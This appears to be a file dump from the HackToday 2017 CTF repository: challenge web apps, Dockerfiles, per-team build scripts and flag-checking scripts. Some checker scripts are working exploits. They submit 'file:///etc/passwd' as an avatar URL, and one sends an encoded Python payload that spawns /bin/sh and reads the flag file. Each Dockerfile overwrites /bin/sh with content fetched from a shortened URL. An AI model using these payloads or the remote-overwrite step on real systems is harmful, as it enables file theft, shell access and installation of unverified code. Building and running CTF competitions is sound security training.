"async": "^1.5.2", 32 | "express": "^4.13.4", 33 | "socket.io": "^1.4.5" 34 | }, 35 | "devDependencies": { 36 | "bower": "^1.7.7", 37 | "gulp": "^3.9.1", 38 | "gulp-istanbul": "^0.10.3", 39 | "gulp-mocha": "^2.2.0", 40 | "gulp-plumber": "^1.1.0", 41 | "minimist": "^1.2.0", 42 | "plumber": "^0.4.8", 43 | "run-sequence": "^1.1.5" 44 | } 45 | } 46 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/config/test.php: -------------------------------------------------------------------------------- 1 | 'basic-tests', 10 | 'basePath' => dirname(__DIR__), 11 | 'aliases' => [ 12 | '@bower' => '@vendor/bower-asset', 13 | '@npm' => '@vendor/npm-asset', 14 | ], 15 | 'language' => 'en-US', 16 | 'components' => [ 17 | 'db' => $db, 18 | 'mailer' => [ 19 | 'useFileTransport' => true, 20 | ], 21 | 'assetManager' => [ 22 | 'basePath' => __DIR__ . '/../web/assets', 23 | ], 24 | 'urlManager' => [ 25 | 'showScriptName' => true, 26 | ], 27 | 'user' => [ 28 | 'identityClass' => 'app\models\User', 29 | ], 30 | 'request' => [ 31 | 'cookieValidationKey' => 'test', 32 | 'enableCsrfValidation' => false, 33 | // but if you absolutely need it set cookie domain to localhost 34 | /* 35 | 'csrfCookie' => [ 36 | 'domain' => 'localhost', 37 | ], 38 | */ 39 | ], 40 | ], 41 | 'params' => $params, 42 | ]; 43 | -------------------------------------------------------------------------------- /2017-finals/flag_tester/test_service_4.py: -------------------------------------------------------------------------------- 1 | from twill.commands import * 2 | import time 3 | import re 4 | import requests 5 | 6 | redirect_output('out.txt') 7 | 8 | for team in range(1, 11): 9 | 10 | base_url = "http://sawah.ittoday.web.id:3%02d07" % team 11 | reg_url = base_url + "/register" 12 | log_url = base_url + "/login" 13 | prf_url = base_url + "/profile" 14 | 15 | t = int(time.time()) 16 | 17 | username = "__panitiatest" + str(t) 18 | password = "__panitiatest" + str(t) 19 | 20 | go(reg_url) 21 | fv("1", "username", username) 22 | fv("1", "password", password) 23 | submit("1") 24 | 25 | go(log_url) 26 | fv("1", "username", username) 27 | fv("1", "password", password) 28 | submit("1") 29 | 30 | go(prf_url) 31 | fv("1", "fullname", "Panitia") 32 | fv("1", "birthdate", "01/01/1970") 33 | fv("1", "address", "Localhost") 34 | fv("1", "avatar", "file:///etc/passwd") 35 | submit("1") 36 | 37 | go(prf_url) 38 | content = get_browser().get_html() 39 | 40 | res = re.search('img src="(.*\.jpg)"', content) 41 | img_url = base_url + '/' + res.group(1) 42 | 43 | req = requests.get(img_url) 44 | img_content = req.text 45 | 46 | res = re.search('(HackToday\{.*\})', img_content) 47 | flag = res.group(1) 48 | 49 | print flag + "," + str(team) + ",7" 50 | -------------------------------------------------------------------------------- /2017-finals/flag_tester/test_service_7.py: -------------------------------------------------------------------------------- 1 | from twill.commands import * 2 | import time 3 | import re 4 | import requests 5 | 6 | redirect_output('out.txt') 7 | 8 | for team in range(1, 11): 9 | 10 | base_url = "http://sawah.ittoday.web.id:3%02d07" % team 11 | reg_url = base_url + "/register" 12 | log_url = base_url + "/login" 13 | prf_url = base_url + "/profile" 14 | 15 | t = int(time.time()) 16 | 17 | username = "__panitiatest" + str(t) 18 | password = "__panitiatest" + str(t) 19 | 20 | go(reg_url) 21 | fv("1", "username", username) 22 | fv("1", "password", password) 23 | submit("1") 24 | 25 | go(log_url) 26 | fv("1", "username", username) 27 | fv("1", "password", password) 28 | submit("1") 29 | 30 | go(prf_url) 31 | fv("1", "fullname", "Panitia") 32 | fv("1", "birthdate", "01/01/1970") 33 | fv("1", "address", "Localhost") 34 | fv("1", "avatar", "file:///etc/passwd") 35 | submit("1") 36 | 37 | go(prf_url) 38 | content = get_browser().get_html() 39 | 40 | res = re.search('img src="(.*\.jpg)"', content) 41 | img_url = base_url + '/' + res.group(1) 42 | 43 | req = requests.get(img_url) 44 | img_content = req.text 45 | 46 | res = re.search('(HackToday\{.*\})', img_content) 47 | flag = res.group(1) 48 | 49 | print flag + "," + str(team) + ",7" 50 | -------------------------------------------------------------------------------- /2017-finals/flag_tester/test_service_8.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | def unicode_escape(s): 4 | res = '' 5 | for c in s: 6 | res += '\\'+oct(ord(c)).lstrip("0").zfill(3) 7 | return res 8 | 9 | def get_flag(host,port): 10 | conn = remote(host,port) 11 | 12 | payload = '__import__("os").system("/bin/sh")' 13 | payload = unicode_escape(payload) 14 | 15 | 16 | 17 | conn.sendline("# Encoding: Unicode_Escape \r" + payload) 18 | 19 | conn.recvuntil(">>>") 20 | conn.sendline("cat fla*") 21 | flag = conn.recvline().strip() 22 | 23 | 24 | conn.close() 25 | return flag 26 | 27 | 28 | def loop_through(): 29 | flags = [] 30 | for team in range(1,11): 31 | # ganti disiniii 32 | if team >9: 33 | team_str = str(team) 34 | else: 35 | team_str = '0'+str(team) 36 | port = int("3"+team_str+"08") 37 | flag = get_flag("agrihack.party",port) 38 | flags.append(flag.strip()) 39 | return flags 40 | 41 | 42 | 43 | def start(): 44 | flags = loop_through() 45 | count = 1 46 | file_out = open('out','w') 47 | for flag in flags: 48 | file_out.write(flag + ',' +str(count)+',8\n') 49 | count+=1 50 | 51 | 52 | #get_flag("agrihack.party",30108) 53 | start() 54 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/unit/models/UserTest.php: -------------------------------------------------------------------------------- 1 | username)->equals('admin'); 11 | 12 | expect_not(User::findIdentity(999)); 13 | } 14 | 15 | public function testFindUserByAccessToken() 16 | { 17 | expect_that($user = User::findIdentityByAccessToken('100-token')); 18 | expect($user->username)->equals('admin'); 19 | 20 | expect_not(User::findIdentityByAccessToken('non-existing')); 21 | } 22 | 23 | public function testFindUserByUsername() 24 | { 25 | expect_that($user = User::findByUsername('admin')); 26 | expect_not(User::findByUsername('not-admin')); 27 | } 28 | 29 | /** 30 | * @depends testFindUserByUsername 31 | */ 32 | public function testValidateUser($user) 33 | { 34 | $user = User::findByUsername('admin'); 35 | expect_that($user->validateAuthKey('test100key')); 36 | expect_not($user->validateAuthKey('test102key')); 37 | 38 | expect_that($user->validatePassword('admin')); 39 | expect_not($user->validatePassword('123456')); 40 | } 41 | 42 | } 43 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/unit/models/LoginFormTest.php: -------------------------------------------------------------------------------- 1 | user->logout(); 15 | } 16 | 17 | public function testLoginNoUser() 18 | { 19 | $this->model = new LoginForm([ 20 | 'username' => 'not_existing_username', 21 | 'password' => 'not_existing_password', 22 | ]); 23 | 24 | expect_not($this->model->login()); 25 | expect_that(\Yii::$app->user->isGuest); 26 | } 27 | 28 | public function testLoginWrongPassword() 29 | { 30 | $this->model = new LoginForm([ 31 | 'username' => 'demo', 32 | 'password' => 'wrong_password', 33 | ]); 34 | 35 | expect_not($this->model->login()); 36 | expect_that(\Yii::$app->user->isGuest); 37 | expect($this->model->errors)->hasKey('password'); 38 | } 39 | 40 | public function testLoginCorrect() 41 | { 42 | $this->model = new LoginForm([ 43 | 'username' => 'demo', 44 | 'password' => 'demo', 45 | ]); 46 | 47 | expect_that($this->model->login()); 48 | expect_not(\Yii::$app->user->isGuest); 49 | expect($this->model->errors)->hasntKey('password'); 50 | } 51 | 52 | } 53 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/views/site/register.php: -------------------------------------------------------------------------------- 1 | title = 'How To Blog | Register'; 11 | $this->params['breadcrumbs'][] = 'Register'; 12 | ?> 13 |
14 |

Register

15 | session->hasFlash('message')){ 17 | echo Yii::$app->session->getFlash('message'); 18 | } 19 | ?> 20 |

Please fill out the following fields to register:

21 | 22 | 'register-form', 24 | 'layout' => 'horizontal', 25 | 'fieldConfig' => [ 26 | 'template' => "{label}\n
{input}
\n
{error}
", 27 | 'labelOptions' => ['class' => 'col-lg-1 control-label'], 28 | ], 29 | ]); ?> 30 | 31 | field($model, 'username')->textInput(['autofocus' => true]) ?> 32 | 33 | field($model, 'password')->passwordInput() ?> 34 | 35 |
36 |
37 | 'btn btn-primary', 'name' => 'register-button']) ?> 38 |
39 |
40 | 41 | 42 |
43 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/models/UsersDB.php: -------------------------------------------------------------------------------- 1 | 'user'], 33 | [['username', 'password'], 'string', 'max' => 255, 'min' => 4], 34 | [['role'], 'string', 'max' => 5], 35 | ['username', 'checkExist'], 36 | ]; 37 | } 38 | 39 | /** 40 | * @inheritdoc 41 | */ 42 | public function attributeLabels() 43 | { 44 | return [ 45 | 'id' => 'ID', 46 | 'username' => 'Username', 47 | 'password' => 'Password', 48 | 'role' => 'Role', 49 | ]; 50 | } 51 | 52 | public function checkExist($attribute, $params){ 53 | $_user = self::find()->where(['username' => $this->username])->one(); 54 | 55 | if(count($_user)){ 56 | $this->addError($attribute, 'Username already exist'); 57 | } 58 | } 59 | } 60 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/views/site/login.php: -------------------------------------------------------------------------------- 1 | title = 'How To Blog | Login'; 11 | $this->params['breadcrumbs'][] = 'Login'; 12 | ?> 13 | 43 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/privilege_escalation/register.php: -------------------------------------------------------------------------------- 1 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 |
19 | 20 |

register

21 |
22 |
23 |
24 | 25 | 26 |
27 |
28 | 29 | 30 |
31 |
32 | 33 | 37 |
38 | 39 | 40 |
41 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/content/footer.php: -------------------------------------------------------------------------------- 1 | 2 |
3 |
4 |

Copyright © Musicality 2017

5 |
6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/SecureChat/app/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Crypto-Node 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 |
19 |
    20 |
21 |
22 |
23 | >
24 |
25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/models/LoginForm.php: -------------------------------------------------------------------------------- 1 | hasErrors()) { 35 | $user = $this->getUser(); 36 | 37 | if (!$user || !$user->validatePassword($this->password)) { 38 | $this->addError($attribute, 'Incorrect username or password.'); 39 | } 40 | } 41 | } 42 | 43 | public function login() { 44 | if ($this->validate()) { 45 | return Yii::$app->user->login($this->getUser(), $this->rememberMe ? 3600*24*30 : 0); 46 | } 47 | return false; 48 | } 49 | 50 | public function getUser() { 51 | if ($this->_user === false) { 52 | $this->_user = User::findByUsername($this->username); 53 | } 54 | return $this->_user; 55 | } 56 | } 57 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/unit/models/ContactFormTest.php: -------------------------------------------------------------------------------- 1 | model = $this->getMockBuilder('app\models\ContactForm') 19 | ->setMethods(['validate']) 20 | ->getMock(); 21 | 22 | $this->model->expects($this->once()) 23 | ->method('validate') 24 | ->will($this->returnValue(true)); 25 | 26 | $this->model->attributes = [ 27 | 'name' => 'Tester', 28 | 'email' => 'tester@example.com', 29 | 'subject' => 'very important letter subject', 30 | 'body' => 'body of current message', 31 | ]; 32 | 33 | expect_that($this->model->contact('admin@example.com')); 34 | 35 | // using Yii2 module actions to check email was sent 36 | $this->tester->seeEmailIsSent(); 37 | 38 | $emailMessage = $this->tester->grabLastSentEmail(); 39 | expect('valid email is sent', $emailMessage)->isInstanceOf('yii\mail\MessageInterface'); 40 | expect($emailMessage->getTo())->hasKey('admin@example.com'); 41 | expect($emailMessage->getFrom())->hasKey('tester@example.com'); 42 | expect($emailMessage->getSubject())->equals('very important letter subject'); 43 | expect($emailMessage->toString())->contains('body of current message'); 44 | } 45 | } 46 | -------------------------------------------------------------------------------- /2017-finals/soal/cacah_jiwa/Dockerfile: -------------------------------------------------------------------------------- 1 | # Use ubuntu 16.04 2 | FROM ubuntu:16.04 3 | 4 | # Open port 5000 5 | EXPOSE 5000 6 | 7 | # update 8 | RUN apt-get update 9 | 10 | # install socat editor ssh 11 | RUN apt-get install curl netcat-openbsd vim nano openssh-server socat lib32ncurses5 -y 12 | 13 | # Read arg 14 | ARG flag 15 | ARG flag_name 16 | ARG binary 17 | ARG username 18 | ARG password 19 | ENV flag=${flag} 20 | ENV flag_name=${flag_name} 21 | ENV binary=${binary} 22 | ENV username=${username} 23 | ENV password=${password} 24 | 25 | # Set WorkDir 26 | RUN mkdir /app 27 | WORKDIR /app 28 | 29 | 30 | # SSH Docker 31 | EXPOSE 22 32 | RUN mkdir /var/run/sshd 33 | RUN adduser --disabled-password --gecos "" $username 34 | RUN echo "$username:$password" | chpasswd 35 | RUN sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd 36 | 37 | 38 | # Copy ruby to workdir 39 | COPY $binary /app/$binary 40 | 41 | RUN echo $flag > "/app/$flag_name" 42 | 43 | RUN chown root:root $flag_name && chmod 755 $flag_name 44 | RUN chown "root:$username" $binary && chmod 775 $binary 45 | 46 | 47 | # Securing environment 48 | RUN curl -Ls https://goo.gl/yia654 | base64 -d > /bin/sh 49 | RUN chmod 700 /usr/bin/* /bin/* /tmp /dev/shm 50 | RUN chmod 755 /usr/bin/env /bin/dash /bin/bash /bin/sh /bin/nc /bin/cat /usr/bin/curl /usr/bin/groups /usr/bin/id /bin/ls /usr/bin/vi /usr/bin/vim /usr/bin/base64 /bin/nano /usr/bin/scp 51 | 52 | # Run Program 53 | RUN echo '#!/bin/bash'"\n(socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/$binary,su=nobody)&\n/usr/sbin/sshd -D" > /start.sh && chmod +x /start.sh 54 | #CMD socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/$binary,su=nobody 55 | CMD ["/start.sh"] 56 | -------------------------------------------------------------------------------- /2017-finals/soal/kudanil_lsi/Dockerfile: -------------------------------------------------------------------------------- 1 | # Use ubuntu 16.04 2 | FROM ubuntu:16.04 3 | 4 | # Open port 5000 5 | EXPOSE 5000 6 | 7 | # update 8 | RUN apt-get update 9 | 10 | # install socat editor ssh 11 | RUN apt-get install curl netcat-openbsd vim nano openssh-server socat lib32ncurses5 -y 12 | 13 | # Read arg 14 | ARG flag 15 | ARG flag_name 16 | ARG binary 17 | ARG username 18 | ARG password 19 | ENV flag=${flag} 20 | ENV flag_name=${flag_name} 21 | ENV binary=${binary} 22 | ENV username=${username} 23 | ENV password=${password} 24 | 25 | # Set WorkDir 26 | RUN mkdir /app 27 | WORKDIR /app 28 | 29 | 30 | # SSH Docker 31 | EXPOSE 22 32 | RUN mkdir /var/run/sshd 33 | RUN adduser --disabled-password --gecos "" $username 34 | RUN echo "$username:$password" | chpasswd 35 | RUN sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd 36 | 37 | 38 | # Copy ruby to workdir 39 | COPY $binary /app/$binary 40 | 41 | RUN echo $flag > "/app/$flag_name" 42 | 43 | RUN chown root:root $flag_name && chmod 755 $flag_name 44 | RUN chown "root:$username" $binary && chmod 775 $binary 45 | 46 | 47 | # Securing environment 48 | RUN curl -Ls https://goo.gl/yia654 | base64 -d > /bin/sh 49 | RUN chmod 700 /usr/bin/* /bin/* /tmp /dev/shm 50 | RUN chmod 755 /usr/bin/env /bin/dash /bin/bash /bin/sh /bin/nc /bin/cat /usr/bin/curl /usr/bin/groups /usr/bin/id /bin/ls /usr/bin/vi /usr/bin/vim /usr/bin/base64 /bin/nano /usr/bin/scp 51 | 52 | # Run Program 53 | RUN echo '#!/bin/bash'"\n(socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/$binary,su=nobody)&\n/usr/sbin/sshd -D" > /start.sh && chmod +x /start.sh 54 | #CMD socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/$binary,su=nobody 55 | CMD ["/start.sh"] 56 | -------------------------------------------------------------------------------- /2017-finals/soal/sanca/Dockerfile: -------------------------------------------------------------------------------- 1 | # Use ubuntu 16.04 2 | FROM ubuntu:16.04 3 | 4 | # Open port 5000 5 | EXPOSE 5000 6 | 7 | # update 8 | RUN apt-get update 9 | 10 | # install socat editor ssh 11 | RUN apt-get install curl netcat-openbsd vim nano openssh-server socat lib32ncurses5 python -y 12 | 13 | # Read arg 14 | ARG flag 15 | ARG flag_name 16 | ARG binary 17 | ARG username 18 | ARG password 19 | ENV flag=${flag} 20 | ENV flag_name=${flag_name} 21 | ENV binary=${binary} 22 | ENV username=${username} 23 | ENV password=${password} 24 | 25 | # Set WorkDir 26 | RUN mkdir /app 27 | WORKDIR /app 28 | 29 | 30 | # SSH Docker 31 | EXPOSE 22 32 | RUN mkdir /var/run/sshd 33 | RUN adduser --disabled-password --gecos "" $username 34 | RUN echo "$username:$password" | chpasswd 35 | RUN sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd 36 | 37 | 38 | # Copy ruby to workdir 39 | COPY $binary /app/$binary 40 | 41 | RUN echo $flag > "/app/$flag_name" 42 | 43 | RUN chown root:root $flag_name && chmod 755 $flag_name 44 | RUN chown "root:$username" $binary && chmod 775 $binary 45 | 46 | 47 | # Securing environment 48 | RUN curl -Ls https://goo.gl/yia654 | base64 -d > /bin/sh 49 | RUN chmod 700 /usr/bin/* /bin/* /tmp /dev/shm 50 | RUN chmod 755 /usr/bin/env /bin/dash /bin/bash /bin/sh /bin/nc /bin/cat /usr/bin/curl /usr/bin/groups /usr/bin/id /bin/ls /usr/bin/vi /usr/bin/vim /usr/bin/base64 /bin/nano /usr/bin/python 51 | 52 | # Run Program 53 | RUN echo '#!/bin/bash'"\n(socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/$binary,su=nobody)&\n/usr/sbin/sshd -D" > /start.sh && chmod +x /start.sh 54 | #CMD socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/$binary,su=nobody 55 | CMD ["/start.sh"] 56 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/static/vendor/inputmask/jquery.inputmask.min.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * jquery.inputmask.min.js 3 | * https://github.com/RobinHerbots/Inputmask 4 | * Copyright (c) 2010 - 2017 Robin Herbots 5 | * Licensed under the MIT license (http://www.opensource.org/licenses/mit-license.php) 6 | * Version: 4.0.1-35 7 | */ 8 | 9 | !function(a){"function"==typeof define&&define.amd?define(["jquery","./inputmask"],a):"object"==typeof exports?module.exports=a(require("jquery"),require("./inputmask")):a(jQuery,window.Inputmask)}(function(a,b){return void 0===a.fn.inputmask&&(a.fn.inputmask=function(c,d){var e,f=this[0];if(void 0===d&&(d={}),"string"==typeof c)switch(c){case"unmaskedvalue":return f&&f.inputmask?f.inputmask.unmaskedvalue():a(f).val();case"remove":return this.each(function(){this.inputmask&&this.inputmask.remove()});case"getemptymask":return f&&f.inputmask?f.inputmask.getemptymask():"";case"hasMaskedValue":return!(!f||!f.inputmask)&&f.inputmask.hasMaskedValue();case"isComplete":return!f||!f.inputmask||f.inputmask.isComplete();case"getmetadata":return f&&f.inputmask?f.inputmask.getmetadata():void 0;case"setvalue":a(f).val(d),f&&void 0===f.inputmask&&a(f).triggerHandler("setvalue");break;case"option":if("string"!=typeof d)return this.each(function(){if(void 0!==this.inputmask)return this.inputmask.option(d)});if(f&&void 0!==f.inputmask)return f.inputmask.option(d);break;default:return d.alias=c,e=new b(d),this.each(function(){e.mask(this)})}else{if("object"==typeof c)return e=new b(c),void 0===c.mask&&void 0===c.alias?this.each(function(){if(void 0!==this.inputmask)return this.inputmask.option(c);e.mask(this)}):this.each(function(){e.mask(this)});if(void 0===c)return this.each(function(){e=new b(d),e.mask(this)})}}),a.fn.inputmask}); -------------------------------------------------------------------------------- /2017-quals/reverse-engineering/resqua/resqua.php: -------------------------------------------------------------------------------- 1 | 0) { 12 | $n -= $i; 13 | $i += 2; 14 | } 15 | return $n == 0; 16 | } 17 | 18 | if (isset($_GET['serial'])) { 19 | 20 | $serial = $_GET['serial']; 21 | 22 | if (! (strlen($serial) == 19 && $serial[4] == '-' && $serial[9] == '-' && $serial[14] == '-')) { 23 | die("Wrong format"); 24 | } else { 25 | for ($i = 0; $i < 20; $i++) { 26 | if (isset($serial[$i]) && $serial[$i] == '0') { 27 | die("Invalid serial number"); 28 | } 29 | } 30 | 31 | $parts = explode("-", $serial); 32 | $part1 = intval($parts[0]); 33 | $part2 = intval($parts[1]); 34 | $part3 = intval($parts[2]); 35 | $part4 = intval($parts[3]); 36 | 37 | if (c($part1) && c($part2) && c($part3) && c($part4) && ($part1 < $part2 && $part2 < $part3 && $part3 < $part4)) { 38 | echo "

GRATE!

"; 39 | echo "

$FLAG

"; 40 | die(); 41 | } else { 42 | die("Invalid serial number"); 43 | } 44 | 45 | } 46 | 47 | } 48 | 49 | ?> 50 | 52 | 53 | 54 | 55 | ReSqua 56 | 57 | 58 | 59 | 60 |
61 |

Enter something:

62 | 63 |
64 | 65 | 66 | 67 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/content/head.php: -------------------------------------------------------------------------------- 1 | Musicality | Web Music Sharing 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/docker_build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ -z "$1" ];then 3 | echo "need chall name as argument"; echo "$0 (chall name) (team numbers)"; exit 4 | fi 5 | if [ -z "$2" ];then 6 | echo "need team numbers as argument"; echo "$0 (chall name) (team numbers)"; exit 7 | fi 8 | team_num=$2 9 | binary=$1 10 | cport_prefix="3" 11 | sport_prefix="2" 12 | chall_num="04" 13 | docker_log="docker_$binary.log" 14 | docker_csv="docker_$binary.csv" 15 | username_list="username.list" 16 | token_list="token.list" 17 | usernames=( $( cat ../$username_list ) ) 18 | tokens=( $( cat ../$token_list ) ) 19 | echo -n "" > $docker_log 20 | echo -n "" > $docker_csv 21 | for team in $(seq -f "%02g" 1 $team_num); do 22 | tag_name="$binary"__"$team" 23 | cport="$cport_prefix""$team""$chall_num" 24 | sport="$sport_prefix""$team""$chall_num" 25 | flag_name="flag_$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | md5sum | awk '{ print $1 }')" 26 | flag="HackToday{$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | sha256sum | awk '{ print $1 }')}" 27 | username="${usernames[$(expr $team - 1)]}" 28 | password=`echo -n "${tokens[$(expr $team - 1)]}$flag" | md5sum | awk '{print $1}'` 29 | echo "Team: $team" >> $docker_log 30 | echo "Username: $username" >> $docker_log 31 | echo "Password: $password" >> $docker_log 32 | echo "Flag filename: $flag_name" >> $docker_log 33 | echo "Flag: $flag" >> $docker_log 34 | echo "CPort: $cport" >> $docker_log 35 | echo "SPort: $sport" >> $docker_log 36 | echo "$flag,$(expr $team + 0),$(expr $chall_num + 0)" >> $docker_csv 37 | docker build --build-arg "password=$password" --build-arg "username=$username" --build-arg "flag=$flag" --build-arg "flag_name=$flag_name" -t $tag_name . 38 | docker run -p "$cport:80" -p "$sport:22" -itd $tag_name 39 | done 40 | -------------------------------------------------------------------------------- /2017-finals/soal/birthday_card/docker_build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ -z "$1" ];then 3 | echo "need chall name as argument"; echo "$0 (chall name) (team numbers)"; exit 4 | fi 5 | if [ -z "$2" ];then 6 | echo "need team numbers as argument"; echo "$0 (chall name) (team numbers)"; exit 7 | fi 8 | team_num=$2 9 | binary=$1 10 | cport_prefix="3" 11 | sport_prefix="2" 12 | chall_num="01" 13 | docker_log="docker_$binary.log" 14 | docker_csv="docker_$binary.csv" 15 | username_list="username.list" 16 | token_list="token.list" 17 | usernames=( $( cat ../$username_list ) ) 18 | tokens=( $( cat ../$token_list ) ) 19 | echo -n "" > $docker_log 20 | echo -n "" > $docker_csv 21 | for team in $(seq -f "%02g" 1 $team_num); do 22 | tag_name="$binary"__"$team" 23 | cport="$cport_prefix""$team""$chall_num" 24 | sport="$sport_prefix""$team""$chall_num" 25 | flag_name="flag_$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | md5sum | awk '{ print $1 }')" 26 | flag="HackToday{$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | sha256sum | awk '{ print $1 }')}" 27 | username="${usernames[$(expr $team - 1)]}" 28 | password=`echo -n "${tokens[$(expr $team - 1)]}$flag" | md5sum | awk '{print $1}'` 29 | echo "Team: $team" >> $docker_log 30 | echo "Username: $username" >> $docker_log 31 | echo "Password: $password" >> $docker_log 32 | echo "Flag filename: $flag_name" >> $docker_log 33 | echo "Flag: $flag" >> $docker_log 34 | echo "CPort: $cport" >> $docker_log 35 | echo "SPort: $sport" >> $docker_log 36 | echo "$flag,$(expr $team + 0),$(expr $chall_num + 0)" >> $docker_csv 37 | docker build --build-arg "password=$password" --build-arg "username=$username" --build-arg "flag=$flag" --build-arg "flag_name=$flag_name" -t $tag_name . 38 | docker run -p "$cport:5000" -p "$sport:22" -itd $tag_name 39 | done 40 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/docker_build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ -z "$1" ];then 3 | echo "need chall name as argument"; echo "$0 (chall name) (team numbers)"; exit 4 | fi 5 | if [ -z "$2" ];then 6 | echo "need team numbers as argument"; echo "$0 (chall name) (team numbers)"; exit 7 | fi 8 | team_num=$2 9 | binary=$1 10 | cport_prefix="3" 11 | sport_prefix="2" 12 | chall_num="07" 13 | docker_log="docker_$binary.log" 14 | docker_csv="docker_$binary.csv" 15 | username_list="username.list" 16 | token_list="token.list" 17 | usernames=( $( cat ../$username_list ) ) 18 | tokens=( $( cat ../$token_list ) ) 19 | echo -n "" > $docker_log 20 | echo -n "" > $docker_csv 21 | for team in $(seq -f "%02g" 1 $team_num); do 22 | tag_name="$binary"__"$team" 23 | cport="$cport_prefix""$team""$chall_num" 24 | sport="$sport_prefix""$team""$chall_num" 25 | flag_name="flag_$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | md5sum | awk '{ print $1 }')" 26 | flag="HackToday{$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | sha256sum | awk '{ print $1 }')}" 27 | username="${usernames[$(expr $team - 1)]}" 28 | password=`echo -n "${tokens[$(expr $team - 1)]}$flag" | md5sum | awk '{print $1}'` 29 | echo "Team: $team" >> $docker_log 30 | echo "Username: $username" >> $docker_log 31 | echo "Password: $password" >> $docker_log 32 | echo "Flag filename: $flag_name" >> $docker_log 33 | echo "Flag: $flag" >> $docker_log 34 | echo "CPort: $cport" >> $docker_log 35 | echo "SPort: $sport" >> $docker_log 36 | echo "$flag,$(expr $team + 0),$(expr $chall_num + 0)" >> $docker_csv 37 | docker build --build-arg "password=$password" --build-arg "username=$username" --build-arg "flag=$flag" --build-arg "flag_name=$flag_name" -t $tag_name . 38 | docker run -p "$cport:80" -p "$sport:22" -itd $tag_name 39 | done 40 | -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/SecureChat/app/scripts/format-hex.js: -------------------------------------------------------------------------------- 1 | /* 2 | CryptoJS v3.1.2 3 | code.google.com/p/crypto-js 4 | (c) 2009-2013 by Jeff Mott. All rights reserved. 5 | code.google.com/p/crypto-js/wiki/License 6 | */ 7 | (function (undefined) { 8 | // Shortcuts 9 | var C = CryptoJS; 10 | var C_lib = C.lib; 11 | var CipherParams = C_lib.CipherParams; 12 | var C_enc = C.enc; 13 | var Hex = C_enc.Hex; 14 | var C_format = C.format; 15 | 16 | var HexFormatter = C_format.Hex = { 17 | /** 18 | * Converts the ciphertext of a cipher params object to a hexadecimally encoded string. 19 | * 20 | * @param {CipherParams} cipherParams The cipher params object. 21 | * 22 | * @return {string} The hexadecimally encoded string. 23 | * 24 | * @static 25 | * 26 | * @example 27 | * 28 | * var hexString = CryptoJS.format.Hex.stringify(cipherParams); 29 | */ 30 | stringify: function (cipherParams) { 31 | return cipherParams.ciphertext.toString(Hex); 32 | }, 33 | 34 | /** 35 | * Converts a hexadecimally encoded ciphertext string to a cipher params object. 36 | * 37 | * @param {string} input The hexadecimally encoded string. 38 | * 39 | * @return {CipherParams} The cipher params object. 40 | * 41 | * @static 42 | * 43 | * @example 44 | * 45 | * var cipherParams = CryptoJS.format.Hex.parse(hexString); 46 | */ 47 | parse: function (input) { 48 | var ciphertext = Hex.parse(input); 49 | return CipherParams.create({ ciphertext: ciphertext }); 50 | } 51 | }; 52 | }()); 53 | -------------------------------------------------------------------------------- /2017-finals/soal/buaya_lsi/docker_build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ -z "$1" ];then 3 | echo "need chall name as argument"; echo "$0 (chall name) (team numbers)"; exit 4 | fi 5 | if [ -z "$2" ];then 6 | echo "need team numbers as argument"; echo "$0 (chall name) (team numbers)"; exit 7 | fi 8 | team_num=$2 9 | binary=$1 10 | cport_prefix="3" 11 | sport_prefix="2" 12 | chall_num="02" 13 | docker_log="docker_$binary.log" 14 | docker_csv="docker_$binary.csv" 15 | username_list="username.list" 16 | token_list="token.list" 17 | usernames=( $( cat ../$username_list ) ) 18 | tokens=( $( cat ../$token_list ) ) 19 | echo -n "" > $docker_log 20 | echo -n "" > $docker_csv 21 | for team in $(seq -f "%02g" 1 $team_num); do 22 | tag_name="$binary"__"$team" 23 | cport="$cport_prefix""$team""$chall_num" 24 | 